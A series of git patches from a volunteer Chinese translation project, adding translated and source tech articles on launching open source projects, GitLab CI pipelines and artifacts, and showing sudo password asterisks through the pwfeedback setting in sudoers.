-[Measuring Your Open Source Program’s Success][10]
-
-[Effective Strategies for Recruiting Open Source Developers][11]
-
-[Participating in Open Source Communities][12]
-
-[Using Open Source Code][13]
-
---------------------------------------------------------------------------------
-
-via: https://www.linuxfoundation.org/blog/launching-open-source-project-free-guide/
-
-作者:[Sam Dean ][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.linuxfoundation.org/author/sdean/
-[1]:https://www.linuxfoundation.org/resources/open-source-guides/starting-open-source-project/
-[2]:https://www.linux.com/blog/learn/chapter/open-source-management/2017/5/googles-new-home-all-things-open-source-runs-deep
-[3]:https://www.linuxfoundation.org/using-open-source-code/
-[4]:https://www.linuxfoundation.org/participating-open-source-communities/
-[5]:https://www.linuxfoundation.org/resources/open-source-guides/starting-open-source-project/
-[6]:https://github.com/todogroup/guides
-[7]:https://github.com/todogroup/guides
-[8]:https://github.com/todogroup/guides/blob/master/creating-an-open-source-program.md
-[9]:https://www.linuxfoundation.org/blog/managing-open-source-programs-free-guide/
-[10]:https://www.linuxfoundation.org/measuring-your-open-source-program-success/
-[11]:https://www.linuxfoundation.org/blog/effective-strategies-recruiting-open-source-developers/
-[12]:https://www.linuxfoundation.org/participating-open-source-communities/
-[13]:https://www.linuxfoundation.org/using-open-source-code/
-[14]:https://www.linuxfoundation.org/author/sdean/
-[15]:https://www.linuxfoundation.org/category/audience/attorneys/
-[16]:https://www.linuxfoundation.org/category/blog/
-[17]:https://www.linuxfoundation.org/category/audience/c-level/
-[18]:https://www.linuxfoundation.org/category/audience/developer-influencers/
-[19]:https://www.linuxfoundation.org/category/audience/entrepreneurs/
-[20]:https://www.linuxfoundation.org/category/content-placement/lf-brand/
-[21]:https://www.linuxfoundation.org/category/audience/open-source-developers/
-[22]:https://www.linuxfoundation.org/category/audience/open-source-professionals/
-[23]:https://www.linuxfoundation.org/category/audience/open-source-users/
From da5a906edad1bf0d3d8adafdaf0e98eaf4b853ed Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sun, 7 Jan 2018 20:39:43 +0800
Subject: [PATCH 145/371] translated
Launching an Open Source Project: A Free Guide
---
...ing an Open Source Project A Free Guide.md | 79 +++++++++++++++++++
1 file changed, 79 insertions(+)
create mode 100644 translated/tech/20171201 Launching an Open Source Project A Free Guide.md
diff --git a/translated/tech/20171201 Launching an Open Source Project A Free Guide.md b/translated/tech/20171201 Launching an Open Source Project A Free Guide.md
new file mode 100644
index 0000000000..843b057a99
--- /dev/null
+++ b/translated/tech/20171201 Launching an Open Source Project A Free Guide.md
@@ -0,0 +1,79 @@
+启动开源项目:免费指导!
+============================================================
+
+![](https://www.linuxfoundation.org/wp-content/uploads/2017/11/project-launch-1024x645.jpg)
+
+启动项目、组建社区支持可能会比较复杂,但是这个全新的指南可以帮助你开启开源项目。
+
+随着开源程序在各种规模的组织中越来越普遍,技术人员和 DevOps 工作者们选择或者被要求启动自己的开源项目。从 Google 到 Netflix 再到 Facebook,这些公司都在将它们的开源创作发布到开源社区。开源项目从公司内部发起,随后借助外部开发人员的协作不断丰富,这种情况已经很常见。
+
+不过,启动一个项目并组建社区支持可能比你想象的要复杂。一些前期准备可以让事情进展得更顺利,而这正是全新的 [启动开源项目][1] 指南的用武之地。
+
+这个免费指南旨在帮助那些已经熟悉开源的组织学习如何启动自己的开源项目。它从流程的最初阶段讲起,包括决定开源什么,然后讨论预算和法律等方面的考虑。创建开源项目的路对很多人来说可能还很陌生,但从 Google 到 Facebook 的各大公司都已经开放了资源并提供了指导。事实上,Google 有一个 [内容丰富的网站][2],专门介绍开源最佳实践以及如何开源项目。
+
+Capital One 开源社区经理 Jared Smith 指出:“无论我们在公司内雇佣了多少聪明人,公司之外总还有更聪明的人。我们发现,把我们的代码开源并与外部世界分享是非常值得的,作为交换,我们能从外部那些拥有专业知识且愿意回馈的人那里得到一些非常好的建议。”
+
+在新指南中,知名开源专家 Ibrahim Haddad 给出了一个组织开源新项目的五个理由:
+
+1. 加速开放的解决方案;为标准提供参考实现;分摊战略性功能的开发成本。
+
+2. 商品化市场;减少非战略软件成本费用。
+
+3. 建立产品生态,驱动需求。
+
+4. 协同合作;吸引客户;深化共同目标间的关系。
+
+5. 为客户提供自我支持的能力:无需等待你就能调整代码。
+
+该指南指出:“是否发布或创建一个新的开源项目,取决于你自身的情况。你的公司应当先通过使用开源软件和参与现有项目,达到一定程度的开源熟练度。这是因为使用开源可以教你如何借助外部的项目和开发者来构建你的产品,而参与开源则能让你更熟悉开源社区的惯例和文化(请参阅我们的指南 [使用开源代码][3] 和 [加入开源社区][4])。而一旦你达到了这种开源熟练度,启动你自己的开源项目的最佳时机就是‘尽早’且‘经常’。”
+
+这些免费资源是基于开源领域领导者们的专业知识制作的。[在这里可以查看所有指南][7],并请继续关注我们的后续报道。
+
+也别错过了本系列早些的文章:
+
+[ 如何创建开源程序 ][8]
+
+[ 开源程序管理工具 ][9]
+
+[ 衡量你的开源项目成功性 ][10]
+
+[ 吸引开源开发者的高效策略 ][11]
+
+[ 加入开源社区 ][12]
+
+[ 使用开源代码 ][13]
+
+--------------------------------------------------------------------------------
+
+via: https://www.linuxfoundation.org/blog/launching-open-source-project-free-guide/
+
+作者:[Sam Dean ][a]
+译者:[译者ID](https://github.com/CYLeft)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linuxfoundation.org/author/sdean/
+[1]:https://www.linuxfoundation.org/resources/open-source-guides/starting-open-source-project/
+[2]:https://www.linux.com/blog/learn/chapter/open-source-management/2017/5/googles-new-home-all-things-open-source-runs-deep
+[3]:https://www.linuxfoundation.org/using-open-source-code/
+[4]:https://www.linuxfoundation.org/participating-open-source-communities/
+[5]:https://www.linuxfoundation.org/resources/open-source-guides/starting-open-source-project/
+[6]:https://github.com/todogroup/guides
+[7]:https://github.com/todogroup/guides
+[8]:https://github.com/todogroup/guides/blob/master/creating-an-open-source-program.md
+[9]:https://www.linuxfoundation.org/blog/managing-open-source-programs-free-guide/
+[10]:https://www.linuxfoundation.org/measuring-your-open-source-program-success/
+[11]:https://www.linuxfoundation.org/blog/effective-strategies-recruiting-open-source-developers/
+[12]:https://www.linuxfoundation.org/participating-open-source-communities/
+[13]:https://www.linuxfoundation.org/using-open-source-code/
+[14]:https://www.linuxfoundation.org/author/sdean/
+[15]:https://www.linuxfoundation.org/category/audience/attorneys/
+[16]:https://www.linuxfoundation.org/category/blog/
+[17]:https://www.linuxfoundation.org/category/audience/c-level/
+[18]:https://www.linuxfoundation.org/category/audience/developer-influencers/
+[19]:https://www.linuxfoundation.org/category/audience/entrepreneurs/
+[20]:https://www.linuxfoundation.org/category/content-placement/lf-brand/
+[21]:https://www.linuxfoundation.org/category/audience/open-source-developers/
+[22]:https://www.linuxfoundation.org/category/audience/open-source-professionals/
+[23]:https://www.linuxfoundation.org/category/audience/open-source-users/
From 39da9557e6c6132ae3adb9a8a07ff9c65164dd7e Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sun, 7 Jan 2018 20:46:21 +0800
Subject: [PATCH 146/371] [apply for translation]
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Linux/Unix desktop fun: Simulates the display from “The Matrix”
---
...-Unix desktop fun- Simulates the display from -The Matrix.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md b/sources/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
index 9935f2a796..5c73a7458c 100644
--- a/sources/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
+++ b/sources/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
@@ -1,3 +1,5 @@
+translating by CYLeft
+
Linux/Unix desktop fun: Simulates the display from “The Matrix”
======
The Matrix is a science fiction action movie from 1999. It was written and directed by the Wachowski Brothers. The film has falling green characters on screen. The digital rain is representing the activity of the virtual reality in "The Matrix." You can now have Matrix digital rain with CMatrix on a Linux or Unix terminal too.
From c3bc479acb4beeaec4d39c5792a1089edea00324 Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sun, 7 Jan 2018 20:48:23 +0800
Subject: [PATCH 147/371] [apply for translation]
cURL vs. wget: Their Differences, Usage and Which One You Should Use
---
...et- Their Differences, Usage and Which One You Should Use.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md b/sources/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
index 9d62198d6a..1ffeac62bc 100644
--- a/sources/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
+++ b/sources/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
@@ -1,3 +1,5 @@
+translating by CYLeft
+
cURL vs. wget: Their Differences, Usage and Which One You Should Use
======
![](https://www.maketecheasier.com/assets/uploads/2017/12/wgc-feat.jpg)
From aa42addae1f0f2a40a3e539f70097ce01d72659b Mon Sep 17 00:00:00 2001
From: FelixYFZ <33593534+FelixYFZ@users.noreply.github.com>
Date: Sun, 7 Jan 2018 21:21:29 +0800
Subject: [PATCH 148/371] Update 20171010 How to test internet speed in Linux
terminal.md
---
.../20171010 How to test internet speed in Linux terminal.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20171010 How to test internet speed in Linux terminal.md b/sources/tech/20171010 How to test internet speed in Linux terminal.md
index 73e0a7f236..85c1832153 100644
--- a/sources/tech/20171010 How to test internet speed in Linux terminal.md
+++ b/sources/tech/20171010 How to test internet speed in Linux terminal.md
@@ -1,3 +1,4 @@
+Translating by FelixYFZ
How to test internet speed in Linux terminal
======
Learn how to use speedtest cli tool to test internet speed in Linux terminal. Also includes one liner python command to get speed details right away.
From 7c8404ca6a889f6aa0ac668948f4df4081f540e2 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 21:57:54 +0800
Subject: [PATCH 149/371] PRF&PUB:20171128 A generic introduction to Gitlab
CI.md
@lujun9972
---
...128 A generic introduction to Gitlab CI.md | 132 ++++++++++++++++++
...128 A generic introduction to Gitlab CI.md | 129 -----------------
2 files changed, 132 insertions(+), 129 deletions(-)
create mode 100644 published/20171128 A generic introduction to Gitlab CI.md
delete mode 100644 translated/tech/20171128 A generic introduction to Gitlab CI.md
diff --git a/published/20171128 A generic introduction to Gitlab CI.md b/published/20171128 A generic introduction to Gitlab CI.md
new file mode 100644
index 0000000000..223f5b4aca
--- /dev/null
+++ b/published/20171128 A generic introduction to Gitlab CI.md
@@ -0,0 +1,132 @@
+Gitlab CI 常规介绍
+======
+
+在 [fleetster][1], 我们搭建了自己的 [Gitlab][2] 实例,而且我们大量使用了 [Gitlab CI][3]。我们的设计师和测试人员也都在用它,也很喜欢用它,它的那些高级功能特别棒。
+
+Gitlab CI 是一个功能非常强大的持续集成系统,有很多不同的功能,而且每次发布都会增加新的功能。它的技术文档也很丰富,但是对那些要在已经配置好的 Gitlab 上使用它的用户来说,它缺乏一个一般性介绍。设计师或者测试人员是无需知道如何通过 Kubernetes 来实现自动伸缩,也无需知道“镜像”和“服务”之间的不同的。
+
+但是,他仍然需要知道什么是“管道”,知道如何查看部署到一个“环境”中的分支。因此,在本文中,我会尽可能覆盖更多的功能,重点放在最终用户应该如何使用它们上;在过去的几个月里,我向我们团队中的某些人包括开发者讲解了这些功能:不是所有人都知道持续集成(CI)是个什么东西,也不是所有人都用过 Gitlab CI。
+
+如果你想了解为什么持续集成那么重要,我建议阅读一下 [这篇文章][4],至于为什么要选择 Gitlab CI 呢,你可以去看看 [Gitlab.com][3] 上的说明。
+
+### 简介
+
+开发者保存代码更改的动作叫做一次提交。然后他可以将这次提交推送到 Gitlab 上,这样其他开发者就可以复查这些代码了。
+
+Gitlab CI 配置好后,Gitlab 也能对这个提交做出一些处理。该处理的工作由一个运行器来执行的。所谓运行器基本上就是一台服务器(也可以是其他的东西,比如你的 PC 机,但我们可以简单称其为服务器)。这台服务器执行 `.gitlab-ci.yml` 文件中指令,并将执行结果返回给 Gitlab 本身,然后在 Gitlab 的图形化界面上显示出来。
+
+开发者完成一项新功能的开发或完成一个 bug 的修复后(这些动作通常包含了多次的提交),就可以发起一个合并请求,团队其他成员则可以在这个合并请求中对代码及其实现进行评论。
+
+我们随后会看到,由于 Gitlab CI 提供的两大特性,环境 与 制品,使得设计者和测试人员也能(而且真的需要)参与到这个过程中来,提供反馈以及改进意见。
+
+### 管道
+
+每个推送到 Gitlab 的提交都会产生一个与该提交关联的管道。若一次推送包含了多个提交,则管道与最后那个提交相关联。管道就是一个分成不同阶段的作业的集合。
+
+同一阶段的所有作业会并发执行(在有足够运行器的前提下),而下一阶段则只会在上一阶段所有作业都运行并返回成功后才会开始。
+
+只要有一个作业失败了,整个管道就失败了。不过我们后面会看到,这其中有一个例外:若某个作业被标注成了手工运行,那么即使失败了也不会让整个管道失败。
+
+阶段则只是对批量的作业的一个逻辑上的划分,若前一个阶段执行失败了,则后一个执行也没什么意义了。比如我们可能有一个构建阶段和一个部署阶段,在构建阶段运行所有用于构建应用的作业,而在部署阶段,会部署构建出来的应用程序。而部署一个构建失败的东西是没有什么意义的,不是吗?
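+
+下面是一个极简的 `.gitlab-ci.yml` 草图,用来说明上面提到的构建/部署两个阶段(原文并没有给出示例,这里的作业名和 `make` 命令都只是假设,具体语法请以官方文档为准):
+```
+stages:
+  - build
+  - deploy
+
+build_app:
+  stage: build
+  script:
+    - make build
+
+deploy_app:
+  stage: deploy
+  script:
+    - make deploy
+```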
+
+同一阶段的作业之间不能有依赖关系,但它们可以依赖于前一阶段的作业运行结果。
+
+让我们来看一下 Gitlab 是如何展示阶段与阶段状态的相关信息的。
+
+![pipeline-overview][5]
+
+![pipeline-status][6]
+
+### 作业
+
+作业就是运行器要执行的指令集合。你可以实时地看到作业的输出结果,这样开发者就能知道作业为什么失败了。
+
+作业可以是自动执行的,也就是当推送提交后自动开始执行,也可以手工执行。手工作业必须由某个人手工触发。手工作业也有其独特的作用,比如,实现自动化部署,但只有在有人手工授权的情况下才能开始部署。这是限制哪些人可以运行作业的一种方式,延续前面的例子来说,这样就只有受信赖的人才能进行部署了。
+
+作业也可以建构出制品来以供用户下载,比如可以构建出一个 APK 让你来下载,然后在你的设备中进行测试; 通过这种方式,设计者和测试人员都可以下载应用并进行测试,而无需开发人员的帮助。
+
+除了生成制品外,作业也可以部署`环境`,通常这个环境可以通过 URL 访问,让用户来测试对应的提交。
+
+作业状态与阶段状态是一样的:实际上,阶段的状态就是继承自作业的。
+
+![running-job][7]
+
+### 制品
+
+如前所述,作业能够生成制品供用户下载来测试。这个制品可以是任何东西,比如 Windows 上的应用程序,PC 生成的图片,甚至 Android 上的 APK。
+
+那么,假设你是个设计师,被分配了一个合并请求:你需要验证新设计的实现!
+
+要该怎么做呢?
+
+你需要打开该合并请求,下载这个制品,如下图所示。
+
+每个管道从所有作业中搜集所有的制品,而且一个作业中可以有多个制品。当你点击下载按钮时,会有一个下拉框让你选择下载哪个制品。检查之后你就可以评论这个合并请求了。
+
+你也可以从没有合并请求的管道中下载制品 ;-)
+
+我之所以关注合并请求是因为通常这正是测试人员、设计师和相关人员开始工作的地方。
+
+但是这并不意味着合并请求和管道就是绑死在一起的:虽然它们结合的很好,但两者之间并没有什么关系。
+
+![download-artifacts][8]
+
+### 环境
+
+类似的,作业可以将某些东西部署到外部服务器上去,以便你可以通过合并请求本身访问这些内容。
+
+如你所见,环境有一个名字和一个链接。只需点击链接你就能够转至你的应用的部署版本上去了(当然,前提是配置正确)。
+
+Gitlab 还有其他一些很酷的环境相关的特性,比如 [监控][9],你可以通过点击环境的名字来查看。
+
+![environment][10]
+
+### 总结
+
+这是对 Gitlab CI 中某些功能的一个简单介绍:它非常强大,使用得当的话,可以让整个团队使用一个工具完成从计划到部署的工具。由于每个月都会推出很多新功能,因此请时刻关注 [Gitlab 博客][11]。
+
+若想知道如何对它进行设置或想了解它的高级功能,请参阅它的[文档][12]。
+
+在 fleetster,我们不仅用它来跑测试,而且用它来自动生成各种版本的软件,并自动发布到测试环境中去。我们也自动化了其他工作(构建应用并将之发布到 Play Store 中等其它工作)。
+
+说起来,**你是否想和我以及其他很多超棒的人一起在一个年轻而又富有活力的办公室中工作呢?** 看看 fleetster 的这些[招聘职位][13] 吧!
+
+赞美 Gitlab 团队 (和其他在空闲时间提供帮助的人),他们的工作太棒了!
+
+若对本文有任何问题或回馈,请给我发邮件:[riccardo@rpadovani.com][14] 或者[发推给我][15]:-) 你可以建议我增加内容,或者以更清晰的方式重写内容(英文不是我的母语)。
+
+
+那么,再见吧,
+
+R.
+
+P.S:如果你觉得本文有用,而且希望我们写出其他文章的话,请问您是否愿意帮我[买杯啤酒给我][17] 让我进入 [鲍尔默峰值][16]?
+
+--------------------------------------------------------------------------------
+
+via: https://rpadovani.com/introduction-gitlab-ci
+
+作者:[Riccardo][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[wxy](https://github.com/wxy)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://rpadovani.com
+[1]:https://www.fleetster.net
+[2]:https://gitlab.com/
+[3]:https://about.gitlab.com/gitlab-ci/
+[4]:https://about.gitlab.com/2015/02/03/7-reasons-why-you-should-be-using-ci/
+[5]:https://img.rpadovani.com/posts/pipeline-overview.png
+[6]:https://img.rpadovani.com/posts/pipeline-status.png
+[7]:https://img.rpadovani.com/posts/running-job.png
+[8]:https://img.rpadovani.com/posts/download-artifacts.png
+[9]:https://gitlab.com/help/ci/environments.md
+[10]:https://img.rpadovani.com/posts/environment.png
+[11]:https://about.gitlab.com/
+[12]:https://docs.gitlab.com/ee/ci/README.html
+[13]:https://www.fleetster.net/fleetster-team.html
+[14]:mailto:riccardo@rpadovani.com
+[15]:https://twitter.com/rpadovani93
+[16]:https://www.xkcd.com/323/
+[17]:https://rpadovani.com/donations
diff --git a/translated/tech/20171128 A generic introduction to Gitlab CI.md b/translated/tech/20171128 A generic introduction to Gitlab CI.md
deleted file mode 100644
index 41dcc5d359..0000000000
--- a/translated/tech/20171128 A generic introduction to Gitlab CI.md
+++ /dev/null
@@ -1,129 +0,0 @@
-Gitlab CI 漫谈
-======
-我们在 [fleetster][1] 中搭建了自己的 [Gitlab][2] 实例,而且我们大量使用了 [Gitlab CI][3]。而且我们的设计师和 QA 也都在用它,也很喜欢用它,它的那些高级功能特别棒。
-
-Gitlab CI 是一个功能非常强大的持续集成系统,有很多不同的功能,而且每次发布都会增加新的功能。它的技术文档也很丰富,但是它缺乏一个面向使用已经配置好的 Gitlab 用户的一般性的介绍。一个设计师或者测试人员是无需知道如何通过 Kubernetes 来实现自动伸缩,也无需知道`镜像`和`服务`之间的不同的。
-
-但是,他仍然需要知道什么是`管道`,如何查看部署到一个`环境`中的分支。因此,在本文中,我会尽可能覆盖更多的功能,关注最终用户应该如何使用 Gitlab; 在过去的几个月里,我向我们团队中的某些人包括开发者讲解了这些功能:不是所有人都知道持续集成是个什么东西,也不是所有人都用过 Gitlab CI。
-
-如果你想了解为什么持续集成那么重要,我建议阅读一下 [这篇文章 ][4],至于为什么要选择 Gitlab CI 呢,你可以去看看 [Gitlab.com][3] 上的说明。
-
-### 简介
-
-开发者保存更改代码的动作叫做一次`提交`。然后他可以将这次提交推送到 Gitlab 上,这样可以其他开发者就可以复查这些代码了。
-
-Gitlab CI 配置好后,Gitlab 也能对这个提交做出一些处理。该处理的工作由一个 `runner` 来执行。所谓 runner 一本上就是一台服务器(也可以是其他的东西,比如你的 PC 机,但我们只是简单的把它看成是一台服务器)。这台服务器执行 `.gitlab-ci.yml` 文件中指令并将执行结果返回给 Gitlab 本身,然后在 Gitlab 的图形化界面上显示出来。
-
-开发者完成一项新功能的开发或完成一个 bug 的修复后(这些动作通常包含了多次的提交),就可以发起一个 `合并请求`,团队其他成员则可以在这个合并请求中对代码和实现进行评论。
-
-我们随后会看到,由于 Gitlab CI 提供的两大特性,`environments` 与 `artifacts`,使得设计者和测试人员也能(而且真的需要!)参与到这个过程中来,提供反馈以及改进意见。
-
-### 管道 (Pipelines)
-
-每个推送到 Gitlab 的提交都会产生一个与该提交关联的`管道`。若一次推送包含了多个提交,则管道与最后那个提交相关联。一个管道就是一个分`阶段`的`作业`的集合。
-
-同一阶段的所有作业会并发执行(在有足够 runner 的前提下),而下一阶段则只会在上一阶段所有作业都运行并返回成功后才会开始。
-
-只要有一个作业失败了,整个管道就失败了。不过我们后面会看到,这其中有一个例外:若某个作业被标注成了手工运行,那么即使失败了也不会让整个管道失败。
-
-阶段则只是对作业批量集合间的一个逻辑上的划分,若前一个任务集合执行失败了,则后一个执行也没什么意义了。比如我们可能有一个`构建`阶段和一个`部署`阶段,在这`构建`阶段运行所有用于构建应用的作业,而在`部署`阶段,会部署构建出来的应用程序。而部署一个构建失败的东西是没有什么意义的,不是吗?
-
-同一阶段的作业之间不能有依赖关系,但他们可以依赖于前一阶段的作业运行结果。
-
-让我们来看一下 Gitlab 是如何展示阶段与阶段状态的相关信息的。
-
-![pipeline-overview][5]
-
-![pipeline-status][6]
-
-### 作业
-
-作业就是 runner 执行的指令集合。你可以实时地看到作业的输出结果,这样开发者就能知道作业为什么失败了。
-
-作业可以是自动执行的,也就是当推送提交后自动开始执行,也可以手工执行。手工作业必须由某个人手工触发。手工作业也有其独特的作用,比如,实现自动化部署,但只有在有人手工授权的情况下才能开始部署。这是限制哪些人可以运行作业的一种方式,这样只有信赖的人才能进行部署,to continue the example before。
-
-作业也可以建构出 `制品 (artifacts)` 来以供用户下载,比如可以构建出一个 APK 让你来下载,然后在你的设备中进行测试; 通过这种方式,设计者和测试人员都可以下载应用并进行测试,而无需开发人员的帮助。
-
-除了生成制品外,作业也可以部署`环境`,通常这个环境可以通过 URL 访问,让用户来测试对应的提交。
-
-做作业状态与阶段状态是一样的:实际上,阶段的状态就是继承自作业的。
-
-![running-job][7]
-
-### 制品 (Artifacts)
-
-如前所述,作业能够生成制品供用户下载来测试。这个制品可以是任何东西,比如 windows 上的应用程序,PC 生成的图片,甚至 Android 上的 APK。
-
-那么,假设你是个设计师,被分配了一个合并请求:你需要验证新设计的实现!
-
-要改怎么做呢?
-
-你需要打开该合并请求,下载制品,如图所示。
-
-每个管道从所有作业中搜集所有的制品,而且一个作业中可以有多个制品。当你点击下载按钮时,会有一个下拉框让你选择下载哪个制品。检查之后你就可以评论这个合并请求了。
-
-你也可以从没有合并请求的管道中下载制品 ;-)
-
-我之所以关注合并请求是因为通常这正是测试人员,设计师和股东开始工作的地方。
-
-但是这并不意味着合并请求和管道就是绑死在一起的:虽然他们结合的很好,但两者之间并没有什么关系。
-
-![download-artifacts][8]
-
-### 环境
-
-类似的,作业可以将某些东西部署到外部服务器上去,似的可以通过合并请求本身访问这些内容。
-
-如你所见,环境有一个名字和一个链接。只需点击链接你就能够转至应用的部署版本上去了(当前,前提是配置是正确的)。
-
-Gitlab 还有其他一些很酷的环境相关的特性,比如 [监控 ][9],你可以通过点击环境的名字来查看。
-
-![environment][10]
-
-### 总结
-
-这是对 Gitlab CI 中某些功能的一个简单介绍:它非常强大,使用得当的话,可以让整个团队使用一个工具完成从计划到部署的工具。由于每个月都会推出很多新功能,因此请时刻关注 [Gitlab 博客 ][11]。
-
-若想知道如何对它进行设置或想了解它的高级功能,请参阅它的[文档 ][12]。
-
-在 fleetster 中,我们不仅用它来跑测试,而且用它来自动生成各种版本的软件,并自动发布到测试环境中去。我们也自动化了其他工作(构建应用并将之发布到 Play Store 中等其他工作)。
-
-说起来,**你是否想和我以及其他很多超棒的人一起在一个年轻而又富有活力的办公室中工作呢?** 看看 fleetster 的这些[开放职位 ][13] 吧!
-
-赞美 Gitlab 团队 (和其他在空闲时间提供帮助的人),他们的工作太棒了!
-
-若对本文有任何问题或回馈,请给我发邮件:[riccardo@rpadovani.com][14] 或者[发推给我 ][15]:-) 你可以建议我增加内容,或者以更清晰的方式重写内容(英文不是我的母语)。
-
-那么,再见吧,
-R。
-
-P.S:如果你觉得本文有用,而且希望我们写出其他文章的话,请问您是否愿意帮我[买被啤酒给我 ][17] 让我进入 [鲍尔默峰值 ][16]?
-
---------------------------------------------------------------------------------
-
-via: https://rpadovani.com/introduction-gitlab-ci
-
-作者:[Riccardo][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://rpadovani.com
-[1]:https://www.fleetster.net
-[2]:https://gitlab.com/
-[3]:https://about.gitlab.com/gitlab-ci/
-[4]:https://about.gitlab.com/2015/02/03/7-reasons-why-you-should-be-using-ci/
-[5]:https://img.rpadovani.com/posts/pipeline-overview.png
-[6]:https://img.rpadovani.com/posts/pipeline-status.png
-[7]:https://img.rpadovani.com/posts/running-job.png
-[8]:https://img.rpadovani.com/posts/download-artifacts.png
-[9]:https://gitlab.com/help/ci/environments.md
-[10]:https://img.rpadovani.com/posts/environment.png
-[11]:https://about.gitlab.com/
-[12]:https://docs.gitlab.com/ee/ci/README.html
-[13]:https://www.fleetster.net/fleetster-team.html
-[14]:mailto:riccardo@rpadovani.com
-[15]:https://twitter.com/rpadovani93
-[16]:https://www.xkcd.com/323/
-[17]:https://rpadovani.com/donations
From 4f548f6b72b42b0381a9da1978972889ace660a1 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 23:03:55 +0800
Subject: [PATCH 150/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Displa?=
=?UTF-8?q?y=20Asterisks=20When=20You=20Type=20Password=20In=20terminal?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...isks When You Type Password In terminal.md | 70 +++++++++++++++++++
1 file changed, 70 insertions(+)
create mode 100644 sources/tech/20180105 How To Display Asterisks When You Type Password In terminal.md
diff --git a/sources/tech/20180105 How To Display Asterisks When You Type Password In terminal.md b/sources/tech/20180105 How To Display Asterisks When You Type Password In terminal.md
new file mode 100644
index 0000000000..d0d8328370
--- /dev/null
+++ b/sources/tech/20180105 How To Display Asterisks When You Type Password In terminal.md
@@ -0,0 +1,70 @@
+How To Display Asterisks When You Type Password In terminal
+======
+
+![](https://www.ostechnix.com/wp-content/uploads/2018/01/Display-Asterisks-When-You-Type-Password-In-terminal-1-720x340.png)
+
+When you type passwords in a web browser login or any GUI login, the passwords will be masked as asterisks like ******** or as bullets like •••••••••••••. This is a built-in security mechanism that prevents users near you from viewing your password. But when you type a password in the Terminal to perform an administrative task with **sudo** or **su**, you won't see any asterisks or bullets as you type. There will be no visual indication that you are entering the password, no cursor movement, nothing at all. You will not know whether you have entered all the characters or not. All you will see is a blank screen!
+
+Look at the following screenshot.
+
+![][2]
+
+As you can see in the above image, I have already entered the password, but there was no indication (either asterisks or bullets). Now, I am not sure whether I entered all the characters of my password or not. This security mechanism also prevents a person near you from guessing the password length. Of course, this behavior can be changed. That is what this guide is all about. It is not that difficult. Read on!
+
+#### Display Asterisks When You Type Password In terminal
+
+To display asterisks as you type a password in the Terminal, we need to make a small modification to the **"/etc/sudoers"** file. Before making any changes, it is better to back up this file. To do so, just run:
+```
+sudo cp /etc/sudoers{,.bak}
+```
+
+The above command will back up the /etc/sudoers file to a new file named /etc/sudoers.bak. You can restore it in case something goes wrong after editing the file.
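+
+If something does go wrong, restoring the backup is just a copy in the other direction, for example:
+```
+sudo cp /etc/sudoers.bak /etc/sudoers
+```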
+
+Next, edit the **"/etc/sudoers"** file using the command:
+```
+sudo visudo
+```
+
+Find the following line:
+```
+Defaults env_reset
+```
+
+![][3]
+
+Add the extra word **",pwfeedback"** to the end of that line as shown below.
+```
+Defaults env_reset,pwfeedback
+```
+
+![][4]
+
+Then, press **"CTRL+x"** and **"y"** to save and close the file. Restart your Terminal for the changes to take effect.
+
+Now, you will see asterisks when you enter password in Terminal.
+
+![][5]
+
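+To try it out right away, you can make sudo forget its cached credentials and then run any harmless command so that it prompts for the password again, for example:
+```
+sudo -k      # drop the cached credentials
+sudo true    # prompts for the password; asterisks should now appear
+```
+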
+If you're not comfortable seeing a blank screen when you type passwords in the Terminal, this small tweak will help. Please be aware that other users can guess your password length if they watch you type it. If you don't mind that, go ahead and make the changes described above to make your password visible (masked as asterisks, of course!).
+
+And, that's all for now. More good stuff to come. Stay tuned!
+
+Cheers!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/display-asterisks-type-password-terminal/
+
+作者:[SK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[2]:http://www.ostechnix.com/wp-content/uploads/2018/01/password-1.png ()
+[3]:http://www.ostechnix.com/wp-content/uploads/2018/01/visudo-1.png ()
+[4]:http://www.ostechnix.com/wp-content/uploads/2018/01/visudo-1-1.png ()
+[5]:http://www.ostechnix.com/wp-content/uploads/2018/01/visudo-2.png ()
